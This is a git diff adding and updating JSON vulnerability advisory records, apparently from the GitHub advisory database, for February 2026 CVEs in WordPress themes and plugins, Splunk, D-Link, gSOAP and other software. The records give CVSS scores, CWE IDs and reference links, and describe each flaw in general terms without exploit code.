"2026-02-20T21:31:22Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22372" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Isida isida allows PHP Local File Inclusion.This issue affects Isida: from n/a through <= 1.4.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22372" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/isida/vulnerability/wordpress-isida-theme-1-4-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json b/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json new file mode 100644 index 0000000000000..1c97a2bfac569 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v76h-ch32-xfcr/GHSA-v76h-ch32-xfcr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v76h-ch32-xfcr", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22365" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Soleng soleng allows PHP Local File Inclusion.This issue affects Soleng: from n/a through <= 1.0.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22365" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/soleng/vulnerability/wordpress-soleng-theme-1-0-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v7h8-7wpg-c8vx/GHSA-v7h8-7wpg-c8vx.json b/advisories/unreviewed/2026/02/GHSA-v7h8-7wpg-c8vx/GHSA-v7h8-7wpg-c8vx.json new file mode 100644 index 0000000000000..6d428e6fac0a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v7h8-7wpg-c8vx/GHSA-v7h8-7wpg-c8vx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v7h8-7wpg-c8vx", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25399" + ], + "details": "Missing Authorization vulnerability in CryoutCreations Serious Slider cryout-serious-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Serious Slider: from n/a through <= 1.2.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25399" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cryout-serious-slider/vulnerability/wordpress-serious-slider-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json new file mode 100644 index 0000000000000..680fbabad4dd1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v859-79r4-4vv5", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24959" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24959" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-3-0-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json b/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json new file mode 100644 index 0000000000000..1eb7117edd702 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8wf-h34r-55f7", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20138" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.9, and 9.2.11, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the Splunk `_internal` index could view the `integrationKey`, `secretKey`, and `appSecretKey` secrets, generated by [Duo Two-Factor Authentication for Splunk Enterprise](https://duo.com/docs/splunk), in plain text.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20138" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0203" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json b/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json new file mode 100644 index 0000000000000..25e79b3d76e98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v929-j8mj-vc74", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-23598" + ], + "details": "Vulnerabilities in the API error handling of an HPE Aruba Networking 5G Core server API could allow an unauthenticated remote attacker to obtain sensitive information. Successful exploitation could allow an attacker to access details such as user accounts, roles, and system configuration, as well as to gain insight into internal services and workflows, increasing the risk of unauthorized access and elevated privileges when combined with other vulnerabilities.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23598" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05002en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v93q-388x-pr6x/GHSA-v93q-388x-pr6x.json b/advisories/unreviewed/2026/02/GHSA-v93q-388x-pr6x/GHSA-v93q-388x-pr6x.json new file mode 100644 index 0000000000000..a02af78a39154 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v93q-388x-pr6x/GHSA-v93q-388x-pr6x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v93q-388x-pr6x", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25411" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the GATEWAY_GREEN parameter. Attackers can send POST requests to the DHCP configuration endpoint with script payloads to execute arbitrary JavaScript in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25411" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-cross-site-scripting-via-dhcp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json index 4d5790a195744..b47498da8485d 100644 --- a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json +++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-285" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-v9v3-ph54-r6qw/GHSA-v9v3-ph54-r6qw.json b/advisories/unreviewed/2026/02/GHSA-v9v3-ph54-r6qw/GHSA-v9v3-ph54-r6qw.json new file mode 100644 index 0000000000000..2c7dde687eabd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9v3-ph54-r6qw/GHSA-v9v3-ph54-r6qw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9v3-ph54-r6qw", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2026-2718" + ], + "details": "The Dealia – Request a Quote plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Gutenberg block attributes in all versions up to, and including, 1.0.6. This is due to the use of `wp_kses()` for output escaping within HTML attribute contexts where `esc_attr()` is required. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2718" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/tags/1.0.6/functions.php#L9" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/tags/1.0.6/templates/widgets/dealia-nonproduct-button.php#L7" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/trunk/functions.php#L9" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/trunk/templates/widgets/dealia-nonproduct-button.php#L7" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/617785d7-90b1-482c-bfff-9b5a63741415?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T10:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json b/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json new file mode 100644 index 0000000000000..999f621f271de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9wq-4qj2-xvh4/GHSA-v9wq-4qj2-xvh4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9wq-4qj2-xvh4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69396" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Splendour splendour allows PHP Local File Inclusion.This issue affects Splendour: from n/a through <= 1.23.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69396" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/splendour/vulnerability/wordpress-splendour-theme-1-23-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json new file mode 100644 index 0000000000000..9a1c8c221619a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcj6-96x2-26j3", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2653" + ], + "details": "A security flaw has been discovered in admesh up to 0.98.5. This issue affects the function stl_check_normal_vector of the file src/normals.c. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. It looks like this product is not really maintained anymore.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2653" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65#issuecomment-3804571402" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh" + }, + { + "type": "WEB", + "url": "https://github.com/user-attachments/files/24878279/id.000035.sig.06.src.000550.time.910126.execs.241742.op.havoc.rep.5.zip" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752596" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json b/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json new file mode 100644 index 0000000000000..7bf08f1488cd2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf3m-rggr-vh64/GHSA-vf3m-rggr-vh64.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf3m-rggr-vh64", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-43228" + ], + "details": "Missing Authorization vulnerability in SecuPress SecuPress Free secupress.This issue affects SecuPress Free: from n/a through <= 2.2.5.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43228" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/secupress/vulnerability/wordpress-secupress-free-plugin-2-2-5-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json new file mode 100644 index 0000000000000..7985e87ba666c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf83-6p8j-54f5", + "modified": "2026-02-20T18:31:27Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27055" + ], + "details": "Missing Authorization vulnerability in PenciDesign Penci AI SmartContent Creator penci-ai allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Penci AI SmartContent Creator: from n/a through <= 2.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27055" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/penci-ai/vulnerability/wordpress-penci-ai-smartcontent-creator-plugin-2-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json new file mode 100644 index 0000000000000..016f1de2f6a51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfcp-69jm-85xv", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27034" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27034" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json b/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json new file mode 100644 index 0000000000000..d7ab563087612 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfjm-qj84-h7cw", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-33088" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow a local user with specific knowledge about the system's architecture to escalate their privileges due to incorrect file permissions for critical resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33088" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260161" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json new file mode 100644 index 0000000000000..94425dd4e91d3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfmw-4jmp-wmrw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60035" + ], + "details": "A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the OPC.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60035" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json b/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json new file mode 100644 index 0000000000000..dac66bfd03145 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vg7x-9fx9-rhfv/GHSA-vg7x-9fx9-rhfv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg7x-9fx9-rhfv", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-52603" + ], + "details": "HCL Connections is vulnerable to information disclosure. In a very specific user navigation scenario, this could allow a user to obtain limited information when a single piece of internal metadata is returned in the browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52603" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124242" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-213" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json b/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json new file mode 100644 index 0000000000000..cedafbf2f830e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vgp4-r46f-r9x7/GHSA-vgp4-r46f-r9x7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vgp4-r46f-r9x7", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2883" + ], + "details": "A vulnerability was determined in D-Link DWR-M960 1.01.07. Impacted is the function sub_427D74 of the file /boafrm/formIpQoS. Executing a manipulation of the argument submit-url can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2883" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/17" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347177" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347177" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754490" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vh22-vqgf-cr4h/GHSA-vh22-vqgf-cr4h.json b/advisories/unreviewed/2026/02/GHSA-vh22-vqgf-cr4h/GHSA-vh22-vqgf-cr4h.json new file mode 100644 index 0000000000000..90c2585ab7b54 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vh22-vqgf-cr4h/GHSA-vh22-vqgf-cr4h.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh22-vqgf-cr4h", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25355" + ], + "details": "gSOAP 2.8 contains a directory traversal vulnerability that allows unauthenticated attackers to access system files by manipulating HTTP path traversal techniques. Attackers can retrieve sensitive files like /etc/passwd by sending crafted GET requests with multiple '../' directory traversal sequences.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25355" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47653" + }, + { + "type": "WEB", + "url": "https://www.genivia.com" + }, + { + "type": "WEB", + "url": "https://www.genivia.com/products.html#gsoap" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/genivia-gsoap-gsoap-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:20Z" + } +} \ No newline at end of file diff --git 